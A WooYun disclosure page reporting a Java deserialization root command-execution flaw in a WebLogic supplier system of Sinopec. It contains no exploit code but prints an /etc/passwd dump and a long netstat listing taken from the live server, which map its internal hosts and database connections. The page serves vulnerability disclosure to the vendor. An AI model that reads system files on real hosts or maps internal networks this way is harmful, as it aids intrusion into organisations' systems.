当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0166055

漏洞标题:中石化某重要系统JAVA反序列化命令执行(ROOT+可入内网)

相关厂商:中国石油化工股份有限公司

漏洞作者: 牛 小 帅

提交时间:2015-12-30 15:03

修复时间:2016-02-12 18:49

公开时间:2016-02-12 18:49

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-12-30: 细节已通知厂商并且等待厂商处理中
2015-12-30: 厂商已经确认,细节仅向厂商公开
2016-01-09: 细节向核心白帽子及相关领域专家公开
2016-01-19: 细节向普通白帽子公开
2016-01-29: 细节向实习白帽子公开
2016-02-12: 细节向公众公开

简要描述:

@中国石油化工股份有限公司 中石化大哥 给分太低了吧,能不能给个15啊 ,大过年你给我5wb太少了吧
[b](root权限+可探测内网3台主机)[/b]

详细说明:

站点:是供应商系统

http://supplier.sinopec.com:9001


存在weblogic应用
root权限

D7@EK14`FRM5{LWB4P}2CED.png


root:!:0:0::/:/usr/bin/ksh
daemon:!:1:1::/etc:
bin:!:2:2::/bin:
sys:!:3:3::/usr/sys:
adm:!:4:4::/var/adm:
uucp:!:5:5::/usr/lib/uucp:
guest:!:100:100::/home/guest:
nobody:!:4294967294:4294967294::/:
lpd:!:9:4294967294::/:
lp:*:11:11::/var/spool/lp:/bin/false
invscout:*:6:12::/var/adm/invscout:/usr/bin/ksh
snapp:*:200:13:snapp login user:/usr/sbin/snapp:/usr/sbin/snappd
ipsec:*:201:1::/etc/ipsec:/usr/bin/ksh
nuucp:*:7:5:uucp login user:/var/spool/uucppublic:/usr/sbin/uucp/uucico
pconsole:*:8:0::/var/adm/pconsole:/usr/bin/ksh
esaadmin:*:10:0::/var/esa:/usr/bin/ksh
supp:!:202:1::/supftp:/usr/bin/bsh


活动的 Internet 连接 (包括服务器)
Proto Recv-Q Send-Q 本地地址 外部地址 (状态)
tcp 0 0 *.* *.* CLOSED
tcp4 0 0 *.* *.* CLOSED
tcp4 0 0 *.13 *.* LISTEN
tcp 0 0 *.21 *.* LISTEN
tcp 0 0 *.23 *.* LISTEN
tcp4 0 0 *.25 *.* LISTEN
tcp4 0 0 *.37 *.* LISTEN
tcp4 0 0 *.111 *.* LISTEN
tcp 0 0 *.199 *.* LISTEN
tcp4 0 0 10.2.188.177.9001 202.96.41.9.46152 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 202.96.41.9.46172 ESTABLISHED
tcp 0 0 10.2.188.177.51524 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 202.96.41.9.46288 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 202.96.41.9.46313 ESTABLISHED
tcp 0 0 *.427 *.* LISTEN
tcp 0 0 10.2.188.177.51603 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.51664 10.5.86.196.1521 ESTABLISHED
tcp 0 0 *.512 *.* LISTEN
tcp 0 0 *.513 *.* LISTEN
tcp 0 0 *.514 *.* LISTEN
tcp 0 0 10.2.188.177.51689 10.5.86.196.1521 ESTABLISHED
tcp 0 0 *.657 *.* LISTEN
tcp 0 0 10.2.188.177.52068 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.52250 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 *.1334 *.* LISTEN
tcp 0 0 10.2.188.177.52754 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.137.64.51.57721 ESTABLISHED
tcp 0 0 10.2.188.177.53322 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.54216 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.54694 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 219.149.59.150.55344 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 219.149.59.150.55345 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 219.149.59.150.55346 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 219.149.59.150.55347 ESTABLISHED
tcp4 0 0 10.2.188.177.7007 10.248.250.61.56077 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 115.183.24.218.53080 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 115.183.24.218.53081 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 115.183.24.218.53125 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 115.183.24.218.53126 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 115.183.24.218.53127 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 115.183.24.218.53129 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 115.183.24.218.53130 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 115.183.24.218.53131 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 115.183.24.218.53132 FIN_WAIT_2
tcp4 0 0 10.2.188.177.80 10.5.99.1.54194 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.5.99.1.54315 FIN_WAIT_2
tcp 0 0 10.2.188.177.56082 10.5.86.196.1521 ESTABLISHED
tcp 0 0 *.5001 *.* LISTEN
tcp 0 0 *.5335 *.* LISTEN
tcp 0 0 *.5336 *.* LISTEN
tcp 0 0 *.5988 *.* LISTEN
tcp 0 0 *.5989 *.* LISTEN
tcp 0 0 *.6181 *.* LISTEN
tcp 0 0 10.2.188.177.57401 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.32959 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57460 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57461 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57463 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57465 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57468 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57470 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57471 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57473 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57474 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57476 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57477 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57478 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57479 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57481 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57486 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57487 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.23 10.5.24.34.1524 ESTABLISHED
tcp 0 0 10.2.188.177.57491 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57496 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57498 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57502 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57509 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57513 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57517 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57521 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57533 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57535 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57536 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57554 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57558 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57563 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57571 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57572 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57604 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.33423 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.57967 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.33493 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.33587 10.5.86.196.1521 ESTABLISHED
tcp 0 0 *.6987 *.* LISTEN
tcp 0 0 10.2.188.177.59098 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 111.206.20.58.1982 ESTABLISHED
tcp 0 0 10.2.188.177.34761 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.102.170.25.3268 FIN_WAIT_2
tcp4 0 0 10.2.188.177.80 10.102.170.25.3271 FIN_WAIT_2
tcp4 0 0 10.2.188.177.80 10.3.112.6.62977 FIN_WAIT_2
tcp4 0 0 10.2.188.177.80 10.3.112.6.62978 FIN_WAIT_2
tcp4 0 0 10.2.188.177.80 10.3.112.6.62979 FIN_WAIT_2
tcp4 0 0 10.2.188.177.80 10.3.112.6.62980 FIN_WAIT_2
tcp4 0 0 10.2.188.177.80 10.3.112.6.62981 FIN_WAIT_2
tcp4 0 0 10.2.188.177.80 10.3.112.6.62984 FIN_WAIT_2
tcp4 0 0 10.2.188.177.80 10.3.112.6.62986 FIN_WAIT_2
tcp 0 0 *.32769 *.* LISTEN
tcp4 0 0 *.32773 *.* LISTEN
tcp4 0 0 *.32774 *.* LISTEN
tcp 0 0 *.32779 *.* LISTEN
tcp 0 0 *.32785 *.* LISTEN
tcp 0 0 10.2.188.177.35050 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 111.206.20.58.2433 ESTABLISHED
tcp 0 0 10.2.188.177.35227 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 *.9090 *.* LISTEN
tcp 0 0 10.2.188.177.35769 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.36060 10.5.86.196.1521 ESTABLISHED
tcp 0 0 *.9510 *.* LISTEN
tcp 0 0 10.2.188.177.60765 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.36691 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.61660 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.37323 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.61992 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.62035 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.62101 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.80 *.* LISTEN
tcp 0 0 10.2.188.177.62354 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.38117 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.62625 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.62672 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.38737 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.38781 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.39007 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.63559 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.39062 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.63622 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.63759 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.39287 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.63797 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.63869 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.238.163.162.63135 ESTABLISHED
tcp4 0 0 10.2.188.177.7001 10.2.188.177.57428 ESTABLISHED
tcp 0 0 10.2.188.177.57428 10.2.188.177.7001 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.238.163.162.63138 ESTABLISHED
tcp4 0 0 10.2.188.177.7001 10.2.188.177.57429 ESTABLISHED
tcp 0 0 10.2.188.177.57429 10.2.188.177.7001 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.238.163.162.63142 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.238.163.162.63150 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.238.163.162.63151 ESTABLISHED
tcp 0 0 10.2.188.177.64103 10.5.86.196.1521 ESTABLISHED
tcp 0 0 *.61950 *.* LISTEN
tcp 0 0 10.2.188.177.64208 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.64263 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.39845 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.39982 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 127.0.0.1.9514 *.* LISTEN
tcp4 0 0 127.0.0.1.9515 *.* LISTEN
tcp 0 0 10.2.188.177.40096 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.64663 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 118.144.194.162.15992 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 118.144.194.162.15993 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 118.144.194.162.15994 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 118.144.194.162.16004 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 118.144.194.162.16007 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 118.144.194.162.16008 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 118.144.194.162.16009 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 118.144.194.162.16010 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 118.144.194.162.16011 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 118.144.194.162.16012 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 118.144.194.162.16013 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 118.144.194.162.16014 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 118.144.194.162.16015 FIN_WAIT_2
tcp 0 0 10.2.188.177.40276 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.64800 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.40459 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.40738 10.5.86.196.1521 ESTABLISHED
tcp 0 0 *.14248 *.* LISTEN
tcp 0 0 10.2.188.177.65497 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41256 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41713 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41714 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41715 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41716 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41718 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41719 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41720 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41721 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41722 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41727 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41728 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41729 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41730 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41731 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41732 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41733 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41734 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41735 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41736 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41737 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41738 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41739 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41740 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41741 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41742 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41743 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41744 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41745 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41746 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.41747 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 111.206.20.58.9302 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 111.206.20.58.9313 ESTABLISHED
tcp 0 0 10.2.188.177.42742 10.5.86.196.1521 ESTABLISHED
tcp 0 0 *.16191 *.* LISTEN
tcp4 0 0 127.0.0.1.199 127.0.0.1.32768 ESTABLISHED
tcp4 0 0 127.0.0.1.32768 127.0.0.1.199 ESTABLISHED
tcp 0 0 10.2.188.177.43221 10.5.86.196.1521 ESTABLISHED
tcp6 0 0 ::1.32777 ::1.32778 CLOSE_WAIT
tcp4 0 0 10.2.188.177.7001 10.2.188.178.61303 ESTABLISHED
tcp4 0 0 10.2.188.177.7001 10.2.188.178.61304 ESTABLISHED
tcp 0 0 10.2.188.177.43565 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.7001 10.2.188.177.37434 ESTABLISHED
tcp 0 0 10.2.188.177.37434 10.2.188.177.7001 ESTABLISHED
tcp 0 0 10.2.188.177.44112 10.5.86.197.1521 ESTABLISHED
tcp 0 0 10.2.188.177.7001 *.* LISTEN
tcp 0 0 10.2.188.177.7003 *.* LISTEN
tcp 0 0 10.2.188.177.7004 *.* LISTEN
tcp 0 0 10.2.188.177.7007 *.* LISTEN
tcp4 0 0 10.2.188.177.9002 10.2.188.178.60923 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 10.150.125.45.55165 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 10.150.125.45.55166 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 10.150.125.45.55172 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 10.150.125.45.55173 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 10.150.125.45.55174 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 10.150.125.45.55175 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 10.150.125.45.55176 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 10.150.125.45.55177 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 10.150.125.45.55178 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 10.150.125.45.55185 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.175.1.126.49822 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.175.1.126.49824 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.175.1.126.49828 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.175.1.126.49829 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.175.1.126.49830 ESTABLISHED
tcp4 0 1214 10.2.188.177.80 10.175.1.126.49831 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.175.1.126.49832 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.175.1.126.49833 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.175.1.126.49834 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.175.1.126.49841 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 101.71.243.74.59784 ESTABLISHED
tcp4 0 0 10.2.188.177.9002 10.2.188.177.61594 ESTABLISHED
tcp 0 0 10.2.188.177.61594 10.2.188.177.9002 ESTABLISHED
tcp4 0 0 10.2.188.177.9002 10.2.188.177.61607 ESTABLISHED
tcp 0 0 10.2.188.177.61607 10.2.188.177.9002 ESTABLISHED
tcp4 0 0 10.2.188.177.9002 10.2.188.177.61608 ESTABLISHED
tcp 0 0 10.2.188.177.61608 10.2.188.177.9002 ESTABLISHED
tcp4 0 0 10.2.188.177.9002 10.2.188.177.61609 ESTABLISHED
tcp 0 0 10.2.188.177.61609 10.2.188.177.9002 ESTABLISHED
tcp 0 0 10.2.188.177.61614 10.2.188.178.9003 ESTABLISHED
tcp 0 0 10.2.188.177.45799 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.45862 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.46035 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 101.71.243.74.60787 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 101.71.243.74.60788 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 101.71.243.74.60789 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 101.71.243.74.60790 ESTABLISHED
tcp 0 0 10.2.188.177.9001 *.* LISTEN
tcp 0 0 10.2.188.177.9002 *.* LISTEN
tcp 0 0 10.2.188.177.9003 *.* LISTEN
tcp4 0 0 10.2.188.177.80 10.81.48.118.1481 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 110.153.53.96.19964 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 110.153.53.96.19970 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 110.153.53.96.19975 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 110.153.53.96.19976 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 110.153.53.96.19978 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 110.153.53.96.19979 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 110.153.53.96.20028 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 110.153.53.96.20048 FIN_WAIT_2
tcp4 0 0 10.2.188.177.9001 110.153.53.96.20049 FIN_WAIT_2
tcp 0 0 10.2.188.177.40426 10.2.188.178.7004 ESTABLISHED
tcp 0 0 10.2.188.177.40581 10.2.188.178.7004 ESTABLISHED
tcp 0 0 10.2.188.177.40653 10.2.188.178.7003 ESTABLISHED
tcp 0 0 10.2.188.177.40684 10.2.188.178.7004 ESTABLISHED
tcp 0 0 10.2.188.177.40747 10.2.188.178.7004 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.84.13.79.59402 ESTABLISHED
tcp 0 0 10.2.188.177.40843 10.2.188.178.7004 ESTABLISHED
tcp 0 0 10.2.188.177.40853 10.2.188.177.7004 TIME_WAIT
tcp 0 0 10.2.188.177.40855 10.2.188.177.7004 TIME_WAIT
tcp 0 0 10.2.188.177.40857 10.2.188.177.7004 TIME_WAIT
tcp 0 0 10.2.188.177.40863 10.2.188.177.7004 TIME_WAIT
tcp 0 0 10.2.188.177.40864 10.2.188.177.7004 TIME_WAIT
tcp 0 0 10.2.188.177.40867 10.2.188.178.7004 ESTABLISHED
tcp 0 0 10.2.188.177.40868 10.2.188.178.7004 ESTABLISHED
tcp 0 0 10.2.188.177.40886 10.2.188.178.7003 ESTABLISHED
tcp 0 0 10.2.188.177.40891 10.2.188.178.7003 ESTABLISHED
tcp 0 0 10.2.188.177.40892 10.2.188.178.7003 ESTABLISHED
tcp 0 0 10.2.188.177.40893 10.2.188.178.7003 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.144.2.45.50081 ESTABLISHED
tcp4 0 0 10.2.188.177.7003 10.2.188.177.40901 ESTABLISHED
tcp 0 0 10.2.188.177.40901 10.2.188.177.7003 ESTABLISHED
tcp4 0 0 10.2.188.177.7004 10.2.188.177.40910 ESTABLISHED
tcp 0 0 10.2.188.177.40910 10.2.188.177.7004 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.85.166.94.3933 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.85.166.94.3956 ESTABLISHED
tcp 0 0 10.2.188.177.47495 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.47910 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.9002 10.2.188.177.64021 ESTABLISHED
tcp 0 0 10.2.188.177.64021 10.2.188.177.9002 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 10.2.188.177.64072 ESTABLISHED
tcp 0 0 10.2.188.177.64072 10.2.188.177.9001 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.84.43.146.3852 ESTABLISHED
tcp 0 0 10.2.188.177.48903 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 123.125.71.117.50481 FIN_WAIT_2
tcp 0 0 10.2.188.177.48992 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.40852 10.2.188.178.9003 ESTABLISHED
tcp 0 0 10.2.188.177.49352 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 10.2.188.177.9003 10.2.188.177.40899 ESTABLISHED
tcp 0 0 10.2.188.177.40899 10.2.188.177.9003 ESTABLISHED
tcp 0 0 10.2.188.177.40902 10.2.188.178.9003 ESTABLISHED
tcp4 0 0 10.2.188.177.9003 10.2.188.177.40905 ESTABLISHED
tcp 0 0 10.2.188.177.40905 10.2.188.177.9003 ESTABLISHED
tcp 0 0 10.2.188.177.49625 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.49780 10.5.86.196.1521 ESTABLISHED
tcp 0 0 10.2.188.177.40031 10.2.133.102.80 LAST_ACK
tcp4 0 0 10.2.188.177.9002 10.2.188.177.41706 ESTABLISHED
tcp 0 0 10.2.188.177.41706 10.2.188.177.9002 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.123.16.92.4822 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.123.16.92.4823 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.123.16.92.4824 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.123.16.92.4825 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.123.16.92.4826 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.123.16.92.4827 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.123.16.92.4828 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.123.16.92.4829 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.123.16.92.4830 ESTABLISHED
tcp4 0 0 10.2.188.177.80 10.123.16.92.4831 ESTABLISHED
tcp 0 0 10.2.188.177.50680 10.5.86.196.1521 ESTABLISHED
tcp4 0 0 127.0.0.1.32769 127.0.0.1.32771 ESTABLISHED
tcp 0 0 127.0.0.1.32771 127.0.0.1.32769 ESTABLISHED
tcp4 0 0 127.0.0.1.32769 127.0.0.1.32772 ESTABLISHED
tcp 0 0 127.0.0.1.32772 127.0.0.1.32769 ESTABLISHED
tcp4 0 0 10.2.188.177.9001 114.242.173.178.59010 ESTABLISHED
udp4 0 0 *.* *.*
udp4 0 0 *.* *.*
udp4 0 0 *.* *.*
udp4 0 0 *.* *.*
udp4 0 0 *.* *.*
udp4 0 0 *.13 *.*
udp4 0 0 *.37 *.*
udp4 0 0 *.111 *.*
udp 0 0 127.255.255.255.123 *.*
udp 0 0 10.2.188.255.123 *.*
udp4 0 0 127.0.0.1.123 *.*
udp4 0 0 10.2.188.177.123 *.*
udp4 0 0 *.123 *.*
udp 0 0 *.161 *.*
udp 0 0 *.427 *.*
udp 0 0 *.514 *.*
udp4 0 0 *.518 *.*
udp 0 0 *.657 *.*
udp4 0 0 *.2279 *.*
udp 0 0 *.7001 *.*
udp 0 0 *.7001 *.*
udp4 0 0 *.32783 *.*
udp4 0 0 *.32809 *.*
udp4 0 0 *.32818 *.*
udp4 0 0 *.32831 *.*
udp4 0 0 *.32844 *.*
udp4 0 0 *.32857 *.*
udp4 0 0 *.32862 *.*
udp 0 0 *.32927 *.*
udp 0 0 *.32970 *.*
udp 0 0 *.9002 *.*
udp 0 0 *.14252 *.*
udp 0 0 *.14253 *.*
活动的 UNIX domain sockets
SADR/PCB Type Recv-Q Send-Q Inode Conn Refs Nextref Addr
f1000e0001ca9808 dgram 0 0 f1000a028076f820 0 0 0 /dev/.SRC-unix/SRCsHasib
f1000e0001cab500
f1000e00027b2808 dgram 0 0 f1000a0281160c20 0 0 0 /dev/.SRC-unix/SRCzLasif
f1000e0001cabf80
f1000e0001caec08 dgram 0 0 f1000a028077fc20 0 0 0 /dev/.SRC-unix/SRCtLasic
f1000e0001cab980
f1000e00027b4008 dgram 0 0 f1000a02810f0c20 0 f1000e00029eac00 0 /dev/log
f1000e0001cabf00
f1000e00027b4408 dgram 0 0 f1000a0281280820 0 0 0 /dev/.SRC-unix/SRCzXasid
f1000e0001cab280
f1000e0001ca9408 dgram 0 0 f1000a0281260c20 0 0 0 /dev/.SRC-unix/SRC1Lasih
f1000e0001cab080
f1000e0001ca9008 dgram 0 0 0 f1000e0001cabf00 0 f1000e0000a28300
f1000e0001cab780
f1000e00027b4c08 dgram 0 0 f1000a02812a0c20 0 0 0 /dev/.SRC-unix/SRC1Xasii
f1000e0001cabb00
